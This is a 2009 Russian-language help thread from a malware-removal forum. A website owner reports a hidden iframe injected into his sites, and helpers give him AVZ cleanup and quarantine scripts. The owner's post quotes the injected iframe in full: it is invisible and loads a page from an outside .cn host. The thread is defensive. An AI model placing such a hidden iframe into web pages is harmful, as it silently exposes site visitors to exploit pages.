Кража фтп-паролей
Емеется несколько сайтов Периодически в файлах стартовой страницы появляется странный код типа этого:
<iframe src="http://ultralitecar.cn:8080/index.php" width=177 height=104 style="visibility: hidden"></iframe>
Причем на каждом сайте. Поменял пароли фтп -не помогло. Похоже, какая-то дрянь отправляет пароли своим владельцам или сама соединяется по фтп Еще странное дело - когда открываю некоторые сайты зачем-то запускается Акробат. Можно тут чем-то помочь?
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
1.AVPtool, "Ручное лечение" --> Скопировать ниже написанный скрипт--> Нажать кнопку "Выполнить".
После выполнения скрипта компьютер перезагрузится.Код:begin SearchRootkit(true, true); SetAVZGuardStatus(True); QuarantineFile('C:\WINDOWS\system32\drivers\i386si.sys',''); QuarantineFile('c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe',''); QuarantineFile('C:\WINDOWS\System32\ATMsrvc.exe',''); QuarantineFile('C:\WINDOWS\TWAIN_32\S6U12BX\SBSpi_T.dll',''); QuarantineFile('C:\WINDOWS\system32\dnssd.dll',''); QuarantineFile('c:\program files\webmoney agent\wmagent.exe',''); DeleteFile('C:\WINDOWS\system32\drivers\i386si.sys'); BC_ImportDeletedList; ExecuteSysClean; BC_Activate; RebootWindows(true); end.
Потом еще один:
Прислать карантин согласно дополнения Как прислать запрошенные файлы.Код:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end.
Он находится в папке программы и называется "quarantine.zip"
Загружать по красной ссылке вверху этой темы "Прислать запрошенный карантин"
2.Повторить логи
Добавлено через 3 минуты
Очень похоже на то, что эти сайты тоже заражены. Т.к. для заражения пользовательских машин используются эксплоиты и для адобовских продуктов - запуск ридера показателен.Сообщение от maximba
Последний раз редактировалось Kuzz; 27.08.2009 в 10:00. Причина: Добавлено
The worst foe lies within the self...
А что значит "Повторить логи"?
Повторите в точности действия, описанные в пп.1 - 3 раздела правил Диагностика, новые логи прикрепите к новому сообщению.
Лог
Прочитайте и выполните: http://virusinfo.info/showthread.php?t=43700
- Удалите Bonjour.
Жалобы есть?
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 5
- В ходе лечения вредоносные программы в карантинах не обнаружены
Уважаемый(ая) maximba, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
